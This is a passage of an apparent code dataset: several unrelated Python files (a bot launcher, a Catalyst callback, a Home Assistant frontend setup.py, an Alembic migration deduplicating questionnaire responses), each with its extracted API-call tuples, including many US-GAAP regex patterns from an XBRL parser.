'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35736, 35738), False, 'from marshmallow import Schema, fields\n'), ((35766, 35781), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35779, 35781), 
False, 'from marshmallow import Schema, fields\n'), ((35813, 35828), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (35826, 35828), False, 'from marshmallow import Schema, fields\n'), ((36048, 36063), 'marshmallow.fields.String', 'fields.String', ([], {}), '()\n', (36061, 36063), False, 'from marshmallow import Schema, fields\n'), ((36083, 36098), 'marshmallow.fields.String', 'fields.String', ([], {}), '()\n', (36096, 36098), False, 'from marshmallow import Schema, fields\n'), ((36124, 36139), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (36137, 36139), False, 'from marshmallow import Schema, fields\n'), ((36159, 36174), 'marshmallow.fields.Number', 'fields.Number', ([], {}), '()\n', (36172, 36174), False, 'from marshmallow import Schema, fields\n'), ((354, 379), 'bs4.BeautifulSoup', 'BeautifulSoup', (['fh', '"""lxml"""'], {}), "(fh, 'lxml')\n", (367, 379), False, 'from bs4 import BeautifulSoup\n'), ((741, 754), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (752, 754), False, 'from collections import OrderedDict\n'), ((2917, 2945), 're.compile', 're.compile', (['"""[0-9]{4}Q[1-4]"""'], {}), "('[0-9]{4}Q[1-4]')\n", (2927, 2945), False, 'import re\n'), ((3392, 3414), 're.compile', 're.compile', (['"""[0-9]{4}"""'], {}), "('[0-9]{4}')\n", (3402, 3414), False, 'import re\n'), ((30623, 30671), 're.split', 're.split', (['"""(?i)(</?[a-z0-9_\\\\.]+>)"""', 'xbrl_string'], {}), "('(?i)(</?[a-z0-9_\\\\.]+>)', xbrl_string)\n", (30631, 30671), False, 'import re\n'), ((30689, 30699), 'io.StringIO', 'StringIO', ([], {}), '()\n', (30697, 30699), False, 'from io import StringIO\n'), ((548, 570), 'BeautifulSoup.BeautifulStoneSoup', 'BeautifulStoneSoup', (['fh'], {}), '(fh)\n', (566, 570), False, 'from BeautifulSoup import BeautifulStoneSoup\n'), ((1105, 1126), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1124, 1126), False, 'import datetime\n'), ((1335, 1362), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(90)'}), '(days=90)\n', (1353, 1362), False, 'import datetime\n'), ((3898, 4026), 'logging.basicConfig', 'logging.basicConfig', ([], {'filename': '"""/tmp/xbrl.log"""', 'level': 'logging.ERROR', 'format': '"""%(asctime)s %(levelname)s %(name)s %(message)s"""'}), "(filename='/tmp/xbrl.log', level=logging.ERROR, format=\n '%(asctime)s %(levelname)s %(name)s %(message)s')\n", (3917, 4026), False, 'import logging\n'), ((4075, 4102), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4092, 4102), False, 'import logging\n'), ((28015, 28104), 're.compile', 're.compile', (['"""^((?!(us-gaap|dei|xbrll|xbrldi)).)*:\\\\s*"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('^((?!(us-gaap|dei|xbrll|xbrldi)).)*:\\\\s*', re.IGNORECASE | re.\n MULTILINE)\n", (28025, 28104), False, 'import re\n'), ((1190, 1236), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['end_date', '"""%Y%m%d"""'], {}), "(end_date, '%Y%m%d')\n", (1216, 1236), False, 'import datetime\n'), ((1418, 1446), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(360)'}), '(days=360)\n', (1436, 1446), False, 'import datetime\n'), ((4906, 4927), 're.compile', 're.compile', (['"""xbrl*:*"""'], {}), "('xbrl*:*')\n", (4916, 4927), False, 'import re\n'), ((5694, 5756), 're.compile', 're.compile', (["(doc_root + 'context')", '(re.IGNORECASE | re.MULTILINE)'], {}), "(doc_root + 'context', re.IGNORECASE | re.MULTILINE)\n", (5704, 5756), False, 'import re\n'), ((8983, 9060), 're.compile', 're.compile', 
(['"""(us-gaap:)[^s]*(assetsnoncurrent)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(assetsnoncurrent)', re.IGNORECASE | re.MULTILINE)\n", (8993, 9060), False, 'import re\n'), ((9532, 9607), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(liabilitiesand)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(liabilitiesand)', re.IGNORECASE | re.MULTILINE)\n", (9542, 9607), False, 'import re\n'), ((9819, 9891), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(liabilities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(liabilities)', re.IGNORECASE | re.MULTILINE)\n", (9829, 9891), False, 'import re\n'), ((10089, 10198), 're.compile', 're.compile', (['"""(us-gaap:)[^s] *(currentliabilities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s] *(currentliabilities)',\n re.IGNORECASE | re.MULTILINE)\n", (10099, 10198), False, 'import re\n'), ((10413, 10525), 're.compile', 're.compile', (['"""(us-gaap:)[^s] *(noncurrentliabilities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s] *(noncurrentliabilities)',\n re.IGNORECASE | re.MULTILINE)\n", (10423, 10525), False, 'import re\n'), ((10753, 10864), 're.compile', 're.compile', (['"""(us-gaap:commitments andcontingencies)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commitments andcontingencies)',\n re.IGNORECASE | re.MULTILINE)\n", (10763, 10864), False, 'import re\n'), ((11111, 11239), 're.compile', 're.compile', (['"""(us-gaap:redeemablenoncontrolling interestequity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:redeemablenoncontrolling interestequity)'\n , re.IGNORECASE | re.MULTILINE)\n", (11121, 11239), False, 'import re\n'), ((11446, 11522), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(temporaryequity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(temporaryequity)', re.IGNORECASE | re.MULTILINE)\n", (11456, 11522), False, 'import re\n'), ((11703, 11770), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(equity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(equity)', re.IGNORECASE | re.MULTILINE)\n", (11713, 11770), False, 'import re\n'), ((11958, 12028), 're.compile', 're.compile', (['"""(us-gaap:minorityinterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:minorityinterest)', re.IGNORECASE | re.MULTILINE)\n", (11968, 12028), False, 'import re\n'), ((12129, 12270), 're.compile', 're.compile', (['"""(us-gaap:partnerscapitalattributable tononcontrollinginterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:partnerscapitalattributable tononcontrollinginterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (12139, 12270), False, 'import re\n'), ((12501, 12614), 're.compile', 're.compile', (['"""(us-gaap:liabilitiesandpartners capital)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:liabilitiesandpartners capital)',\n re.IGNORECASE | re.MULTILINE)\n", (12511, 12614), False, 'import re\n'), ((12703, 12775), 're.compile', 're.compile', (['"""(us-gaap:stockholdersequity)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:stockholdersequity)', re.IGNORECASE | re.MULTILINE)\n", (12713, 12775), False, 'import re\n'), ((13120, 13189), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(revenues)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(revenues)', re.IGNORECASE | re.MULTILINE)\n", (13130, 13189), False, 'import re\n'), ((13370, 13437), 're.compile', 're.compile', (['"""(us-gaap:costofrevenue)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), 
"('(us-gaap:costofrevenue)', re.IGNORECASE | re.MULTILINE)\n", (13380, 13437), False, 'import re\n'), ((13525, 13593), 're.compile', 're.compile', (['"""(us-gaap:costofservices)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofservices)', re.IGNORECASE | re.MULTILINE)\n", (13535, 13593), False, 'import re\n'), ((13681, 13750), 're.compile', 're.compile', (['"""(us-gaap:costofgoodssold)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofgoodssold)', re.IGNORECASE | re.MULTILINE)\n", (13691, 13750), False, 'import re\n'), ((13838, 13948), 're.compile', 're.compile', (['"""(us-gaap:costofgoodsand servicessold)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:costofgoodsand servicessold)',\n re.IGNORECASE | re.MULTILINE)\n", (13848, 13948), False, 'import re\n'), ((14145, 14217), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(grossprofit)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(grossprofit)', re.IGNORECASE | re.MULTILINE)\n", (14155, 14217), False, 'import re\n'), ((14416, 14494), 're.compile', 're.compile', (['"""(us-gaap:operating)[^s]*(expenses)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:operating)[^s]*(expenses)', re.IGNORECASE | re.MULTILINE)\n", (14426, 14494), False, 'import re\n'), ((14705, 14782), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(costsandexpenses)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(costsandexpenses)', re.IGNORECASE | re.MULTILINE)\n", (14715, 14782), False, 'import re\n'), ((14997, 15071), 're.compile', 're.compile', (['"""(us-gaap:otheroperatingincome)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:otheroperatingincome)', re.IGNORECASE | re.MULTILINE)\n", (15007, 15071), False, 'import re\n'), ((15293, 15367), 're.compile', 're.compile', (['"""(us-gaap:otheroperatingincome)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:otheroperatingincome)', re.IGNORECASE | re.MULTILINE)\n", (15303, 15367), False, 'import re\n'), ((15590, 15666), 're.compile', 're.compile', (['"""(us-gaap:nonoperatingincomeloss)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:nonoperatingincomeloss)', re.IGNORECASE | re.MULTILINE)\n", (15600, 15666), False, 'import re\n'), ((15896, 15972), 're.compile', 're.compile', (['"""(us-gaap:interestanddebtexpense)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:interestanddebtexpense)', re.IGNORECASE | re.MULTILINE)\n", (15906, 15972), False, 'import re\n'), ((16211, 16342), 're.compile', 're.compile', (['"""(us-gaap:incomelossfromcontinuingoperationsbeforeincometaxesminorityinterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:incomelossfromcontinuingoperationsbeforeincometaxesminorityinterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (16221, 16342), False, 'import re\n'), ((16674, 16769), 're.compile', 're.compile', (['"""(us-gaap:incomelossfromequitymethodinvestments)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:incomelossfromequitymethodinvestments)', re.IGNORECASE |\n re.MULTILINE)\n", (16684, 16769), False, 'import re\n'), ((17011, 17088), 're.compile', 're.compile', (['"""(us-gaap:incometaxexpensebenefit)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:incometaxexpensebenefit)', re.IGNORECASE | re.MULTILINE)\n", (17021, 17088), False, 'import re\n'), ((17329, 17501), 're.compile', 're.compile', (['"""(us-gaap:IncomeLossBeforeExtraordinaryItems AndCumulativeEffectOfChangeInAccountingPrinciple)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n 
'(us-gaap:IncomeLossBeforeExtraordinaryItems AndCumulativeEffectOfChangeInAccountingPrinciple)'\n , re.IGNORECASE | re.MULTILINE)\n", (17339, 17501), False, 'import re\n'), ((17744, 17831), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(discontinuedoperation)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(discontinuedoperation)', re.IGNORECASE | re.\n MULTILINE)\n", (17754, 17831), False, 'import re\n'), ((18073, 18152), 're.compile', 're.compile', (['"""(us-gaap:extraordinaryitemnetoftax)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:extraordinaryitemnetoftax)', re.IGNORECASE | re.MULTILINE)\n", (18083, 18152), False, 'import re\n'), ((18377, 18448), 're.compile', 're.compile', (['"""(us-gaap:)[^s]*(incomeloss)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:)[^s]*(incomeloss)', re.IGNORECASE | re.MULTILINE)\n", (18387, 18448), False, 'import re\n'), ((18624, 18688), 're.compile', 're.compile', (['"""(us-gaap:profitloss)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:profitloss)', re.IGNORECASE | re.MULTILINE)\n", (18634, 18688), False, 'import re\n'), ((18901, 19034), 're.compile', 're.compile', (['"""(us-gaap:netincomeavailabletocommon stockholdersbasic)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netincomeavailabletocommon stockholdersbasic)'\n , re.IGNORECASE | re.MULTILINE)\n", (18911, 19034), False, 'import re\n'), ((19254, 19386), 're.compile', 're.compile', (['"""(us-gaap:preferredstockdividendsand otheradjustments)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:preferredstockdividendsand otheradjustments)'\n , re.IGNORECASE | re.MULTILINE)\n", (19264, 19386), False, 'import re\n'), ((19589, 19728), 're.compile', 're.compile', (['"""(us-gaap:netincomelossattributableto noncontrollinginterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netincomelossattributableto noncontrollinginterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (19599, 19728), False, 'import re\n'), ((19952, 20019), 're.compile', 're.compile', (['"""^us-gaap:netincomeloss$"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('^us-gaap:netincomeloss$', re.IGNORECASE | re.MULTILINE)\n", (19962, 20019), False, 'import re\n'), ((20232, 20357), 're.compile', 're.compile', (['"""(us-gaap:othercomprehensiveincomeloss netoftax)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:othercomprehensiveincomeloss netoftax)',\n re.IGNORECASE | re.MULTILINE)\n", (20242, 20357), False, 'import re\n'), ((20553, 20626), 're.compile', 're.compile', (['"""(us-gaap:comprehensiveincome)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:comprehensiveincome)', re.IGNORECASE | re.MULTILINE)\n", (20563, 20626), False, 'import re\n'), ((20850, 20936), 're.compile', 're.compile', (['"""(us-gaap:comprehensiveincomenetoftax)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:comprehensiveincomenetoftax)', re.IGNORECASE | re.\n MULTILINE)\n", (20860, 20936), False, 'import re\n'), ((21174, 21327), 're.compile', 're.compile', (['"""(us-gaap:comprehensiveincomenetoftax attributabletononcontrollinginterest)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:comprehensiveincomenetoftax attributabletononcontrollinginterest)'\n , re.IGNORECASE | re.MULTILINE)\n", (21184, 21327), False, 'import re\n'), ((21591, 21723), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin operatingactivities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin operatingactivities)'\n , re.IGNORECASE | 
re.MULTILINE)\n", (21601, 21723), False, 'import re\n'), ((21918, 22050), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin investingactivities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin investingactivities)'\n , re.IGNORECASE | re.MULTILINE)\n", (21928, 22050), False, 'import re\n'), ((22245, 22377), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin financingactivities)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin financingactivities)'\n , re.IGNORECASE | re.MULTILINE)\n", (22255, 22377), False, 'import re\n'), ((22583, 22735), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin operatingactivitiescontinuingoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin operatingactivitiescontinuingoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (22593, 22735), False, 'import re\n'), ((22983, 23135), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin investingactivitiescontinuingoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin investingactivitiescontinuingoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (22993, 23135), False, 'import re\n'), ((23389, 23541), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin financingactivitiescontinuingoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin financingactivitiescontinuingoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (23399, 23541), False, 'import re\n'), ((23797, 23948), 're.compile', 're.compile', (['"""(us-gaap:cashprovidedbyusedin operatingactivitiesdiscontinuedoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:cashprovidedbyusedin operatingactivitiesdiscontinuedoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (23807, 23948), False, 'import re\n'), ((24208, 24359), 're.compile', 're.compile', (['"""(us-gaap:cashprovidedbyusedin investingactivitiesdiscontinuedoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:cashprovidedbyusedin investingactivitiesdiscontinuedoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (24218, 24359), False, 'import re\n'), ((24609, 24744), 're.compile', 're.compile', (['"""(us-gaap:netcashprovidedbyusedin discontinuedoperations)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "(\n '(us-gaap:netcashprovidedbyusedin discontinuedoperations)'\n , re.IGNORECASE | re.MULTILINE)\n", (24619, 24744), False, 'import re\n'), ((24972, 25084), 're.compile', 're.compile', (['"""(us-gaap:commonstockshares outstanding)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commonstockshares outstanding)',\n re.IGNORECASE | re.MULTILINE)\n", (24982, 25084), False, 'import re\n'), ((25309, 25417), 're.compile', 're.compile', (['"""(us-gaap:commonstockshares issued)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commonstockshares issued)', \n re.IGNORECASE | re.MULTILINE)\n", (25319, 25417), False, 'import re\n'), ((25635, 25746), 're.compile', 're.compile', (['"""(us-gaap:commonstockshares authorized)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(us-gaap:commonstockshares authorized)',\n re.IGNORECASE | re.MULTILINE)\n", (25645, 25746), False, 'import re\n'), ((26186, 26249), 're.compile', 're.compile', (['"""(dei:tradingsymbol)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:tradingsymbol)', re.IGNORECASE | re.MULTILINE)\n", (26196, 26249), False, 'import re\n'), ((26569, 26639), 
're.compile', 're.compile', (['"""(dei:entityregistrantname)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:entityregistrantname)', re.IGNORECASE | re.MULTILINE)\n", (26579, 26639), False, 'import re\n'), ((26961, 27050), 're.compile', 're.compile', (['"""(dei:entitycommonstocksharesoutstanding)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:entitycommonstocksharesoutstanding)', re.IGNORECASE | re.\n MULTILINE)\n", (26971, 27050), False, 'import re\n'), ((27373, 27440), 're.compile', 're.compile', (['"""(dei:entitypublicfloat)"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('(dei:entitypublicfloat)', re.IGNORECASE | re.MULTILINE)\n", (27383, 27440), False, 'import re\n'), ((30405, 30454), 're.findall', 're.findall', (['"""(?i)</([a-z0-9_\\\\.]+)>"""', 'xbrl_string'], {}), "('(?i)</([a-z0-9_\\\\.]+)>', xbrl_string)\n", (30415, 30454), False, 'import re\n'), ((5148, 5199), 're.compile', 're.compile', (['"""context"""', '(re.IGNORECASE | re.MULTILINE)'], {}), "('context', re.IGNORECASE | re.MULTILINE)\n", (5158, 5199), False, 'import re\n'), ((31281, 31309), 're.findall', 're.findall', (['"""(?i)<*>"""', 'token'], {}), "('(?i)<*>', token)\n", (31291, 31309), False, 'import re\n'), ((2320, 2347), 'datetime.timedelta', 'datetime.timedelta', ([], {'weeks': '(1)'}), '(weeks=1)\n', (2338, 2347), False, 'import datetime\n'), ((6403, 6424), 're.compile', 're.compile', (['"""[^\\\\d]+"""'], {}), "('[^\\\\d]+')\n", (6413, 6424), False, 'import re\n'), ((7029, 7050), 're.compile', 're.compile', (['"""[^\\\\d]+"""'], {}), "('[^\\\\d]+')\n", (7039, 7050), False, 'import re\n'), ((7700, 7721), 're.compile', 're.compile', (['"""[^\\\\d]+"""'], {}), "('[^\\\\d]+')\n", (7710, 7721), False, 'import re\n')]
|
import os
from bot.clientSetup import clientSetup
from bot.preferences import Preferences
def main():
os.chdir(os.path.dirname(__file__))
p = Preferences()
c = clientSetup(p)
f = open("data/token.txt", 'r')
token = f.readline()[:-1]
f.close()
c.run(token)
main()
|
[
"os.path.dirname",
"bot.clientSetup.clientSetup",
"bot.preferences.Preferences"
] |
[((154, 167), 'bot.preferences.Preferences', 'Preferences', ([], {}), '()\n', (165, 167), False, 'from bot.preferences import Preferences\n'), ((176, 190), 'bot.clientSetup.clientSetup', 'clientSetup', (['p'], {}), '(p)\n', (187, 190), False, 'from bot.clientSetup import clientSetup\n'), ((118, 143), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (133, 143), False, 'import os\n')]
|
from collections import defaultdict
from catalyst.core.callback import Callback, CallbackNode, CallbackOrder
from catalyst.core.runner import IRunner
class ValidationManagerCallback(Callback):
"""
A callback to aggregate runner.valid_metrics from runner.epoch_metrics.
"""
def __init__(self):
"""@TODO: Docs. Contribution is welcome."""
super().__init__(
order=CallbackOrder.Validation, node=CallbackNode.All,
)
def on_epoch_start(self, runner: IRunner) -> None:
"""Epoch start hook.
Args:
runner (IRunner): current runner
"""
runner.valid_metrics = defaultdict(None)
runner.is_best_valid = False
def on_epoch_end(self, runner: IRunner) -> None:
"""Epoch end hook.
Args:
runner (IRunner): current runner
"""
if runner.stage_name.startswith("infer"):
return
runner.valid_metrics = {
k.replace(f"{runner.valid_loader}_", ""): v
for k, v in runner.epoch_metrics.items()
if k.startswith(runner.valid_loader)
}
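        # e.g. with runner.valid_loader == "valid", epoch_metrics such as
        # {"train_loss": 0.7, "valid_loss": 0.6} reduce to
        # runner.valid_metrics == {"loss": 0.6} (values are illustrative)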
assert (
runner.main_metric in runner.valid_metrics
), f"{runner.main_metric} value is not available by the epoch end"
current_valid_metric = runner.valid_metrics[runner.main_metric]
if runner.minimize_metric:
best_valid_metric = runner.best_valid_metrics.get(
runner.main_metric, float("+inf")
)
is_best = current_valid_metric < best_valid_metric
else:
best_valid_metric = runner.best_valid_metrics.get(
runner.main_metric, float("-inf")
)
is_best = current_valid_metric > best_valid_metric
if is_best:
runner.is_best_valid = True
runner.best_valid_metrics = runner.valid_metrics.copy()
__all__ = ["ValidationManagerCallback"]
|
[
"collections.defaultdict"
] |
[((656, 673), 'collections.defaultdict', 'defaultdict', (['None'], {}), '(None)\n', (667, 673), False, 'from collections import defaultdict\n')]
|
from setuptools import setup, find_packages
setup(
name="home-assistant-frontend",
version="20191108.0",
description="The Home Assistant frontend",
url="https://github.com/home-assistant/home-assistant-polymer",
author="The Home Assistant Authors",
author_email="<EMAIL>",
license="Apache License 2.0",
packages=find_packages(include=["hass_frontend", "hass_frontend.*"]),
include_package_data=True,
zip_safe=False,
)
|
[
"setuptools.find_packages"
] |
[((345, 404), 'setuptools.find_packages', 'find_packages', ([], {'include': "['hass_frontend', 'hass_frontend.*']"}), "(include=['hass_frontend', 'hass_frontend.*'])\n", (358, 404), False, 'from setuptools import setup, find_packages\n')]
|
"""Remove duplicate QNR.identifiers
Revision ID: a1de3ab4d050
Revises: <KEY>
Create Date: 2019-02-11 16:48:55.332527
"""
import json
from sqlalchemy import func
from portal.database import db
from portal.dict_tools import dict_compare
from portal.models.audit import Audit
from portal.models.identifier import Identifier
from portal.models.questionnaire_response import QuestionnaireResponse
from portal.models.user import User
# revision identifiers, used by Alembic.
revision = 'a1de3ab4d050'
down_revision = '<KEY>'
def admin_id():
sys = User.query.filter_by(email='__system__').first()
return sys.id
def diff_docs(doc1, doc2):
"""Print details of two differing QNR documents"""
added, removed, modified, _ = dict_compare(doc1, doc2)
assert not added
assert not removed
assert not set(modified) - set(['authored', 'group'])
if modified:
if len(doc1['group']) != len(doc2['group']):
raise ValueError("diff group lens")
answers1 = doc1['group']
answers2 = doc2['group']
for a1, a2 in zip(answers1, answers2):
assert a1.keys() == a2.keys()
assert (a1['answer']['valueCoding']['code'] ==
a2['answer']['valueCoding']['code'])
if (a1['answer']['valueCoding']['extension']['valueDecimal'] !=
a2['answer']['valueCoding']['extension']['valueDecimal']):
print(" Question: {} valueDecimal: {} VERSUS {}".format(
a1['answer']['valueCoding']['code'],
a1['answer']['valueCoding']['extension']['valueDecimal'],
a2['answer']['valueCoding']['extension']['valueDecimal']))
def merge_duplicates(system, value):
msg = "merging questionnaire_responses with identifier ({}|{})".format(
system, value)
identifier = Identifier(system=system, value=value)
qnrs = QuestionnaireResponse.by_identifier(identifier)
print("found {} duplicates {}".format(len(qnrs), msg))
subject_ids = {q.subject_id for q in qnrs}
if len(subject_ids) != 1:
raise ValueError("ERROR, expect single subject {}".format(msg))
docs = [q.document for q in qnrs]
json_docs = {json.dumps(q.document) for q in qnrs}
if len(json_docs) != 1:
print("SKIP {} due to mismatching documents".format(
msg))
d1 = docs.pop()
while True:
d2 = docs.pop()
diff_docs(d1, d2)
d1 = d2
if not docs:
break
return # skipping out due to document mismatch
    # Looks like perfect matches across the board - let's keep the first only
del_ids = [q.id for q in qnrs][1:]
audit = Audit(
user_id=admin_id(), subject_id=subject_ids.pop(),
_context='assessment',
comment="{} eliminating duplicate qnr.ids ({})".format(
msg, str(del_ids)))
db.session.add(audit)
QuestionnaireResponse.query.filter(
QuestionnaireResponse.id.in_(del_ids)).delete(
synchronize_session='fetch')
db.session.commit()
def upgrade():
# Only concerned about QuestionnaireResponses with more than
# one matching identifier
q = db.session.query(
QuestionnaireResponse.document['identifier']['system'],
QuestionnaireResponse.document['identifier']['value']).filter(
QuestionnaireResponse.document['identifier'].isnot(None)).group_by(
QuestionnaireResponse.document['identifier']['system'],
QuestionnaireResponse.document['identifier']['value']).having(
func.count(QuestionnaireResponse.document['identifier']) > 1)
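    # Roughly equivalent SQL (PostgreSQL JSON operators; table name assumed):
    #   SELECT document -> 'identifier' -> 'system',
    #          document -> 'identifier' -> 'value'
    #   FROM questionnaire_responses
    #   WHERE document -> 'identifier' IS NOT NULL
    #   GROUP BY 1, 2
    #   HAVING count(document -> 'identifier') > 1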
# gather list of (system, value) tuples for subsequent attention.
# can't process inside query loop
needs_attention = [(system, value) for system, value in q]
for system, value in needs_attention:
merge_duplicates(system, value)
def downgrade():
# Don't restore that mess
pass
|
[
"portal.database.db.session.query",
"portal.models.questionnaire_response.QuestionnaireResponse.by_identifier",
"portal.models.questionnaire_response.QuestionnaireResponse.id.in_",
"portal.database.db.session.add",
"json.dumps",
"portal.database.db.session.commit",
"portal.models.user.User.query.filter_by",
"sqlalchemy.func.count",
"portal.models.identifier.Identifier",
"portal.dict_tools.dict_compare"
] |
[((735, 759), 'portal.dict_tools.dict_compare', 'dict_compare', (['doc1', 'doc2'], {}), '(doc1, doc2)\n', (747, 759), False, 'from portal.dict_tools import dict_compare\n'), ((1849, 1887), 'portal.models.identifier.Identifier', 'Identifier', ([], {'system': 'system', 'value': 'value'}), '(system=system, value=value)\n', (1859, 1887), False, 'from portal.models.identifier import Identifier\n'), ((1899, 1946), 'portal.models.questionnaire_response.QuestionnaireResponse.by_identifier', 'QuestionnaireResponse.by_identifier', (['identifier'], {}), '(identifier)\n', (1934, 1946), False, 'from portal.models.questionnaire_response import QuestionnaireResponse\n'), ((2908, 2929), 'portal.database.db.session.add', 'db.session.add', (['audit'], {}), '(audit)\n', (2922, 2929), False, 'from portal.database import db\n'), ((3067, 3086), 'portal.database.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3084, 3086), False, 'from portal.database import db\n'), ((2213, 2235), 'json.dumps', 'json.dumps', (['q.document'], {}), '(q.document)\n', (2223, 2235), False, 'import json\n'), ((550, 590), 'portal.models.user.User.query.filter_by', 'User.query.filter_by', ([], {'email': '"""__system__"""'}), "(email='__system__')\n", (570, 590), False, 'from portal.models.user import User\n'), ((3579, 3635), 'sqlalchemy.func.count', 'func.count', (["QuestionnaireResponse.document['identifier']"], {}), "(QuestionnaireResponse.document['identifier'])\n", (3589, 3635), False, 'from sqlalchemy import func\n'), ((2979, 3016), 'portal.models.questionnaire_response.QuestionnaireResponse.id.in_', 'QuestionnaireResponse.id.in_', (['del_ids'], {}), '(del_ids)\n', (3007, 3016), False, 'from portal.models.questionnaire_response import QuestionnaireResponse\n'), ((3207, 3338), 'portal.database.db.session.query', 'db.session.query', (["QuestionnaireResponse.document['identifier']['system']", "QuestionnaireResponse.document['identifier']['value']"], {}), "(QuestionnaireResponse.document['identifier']['system'],\n 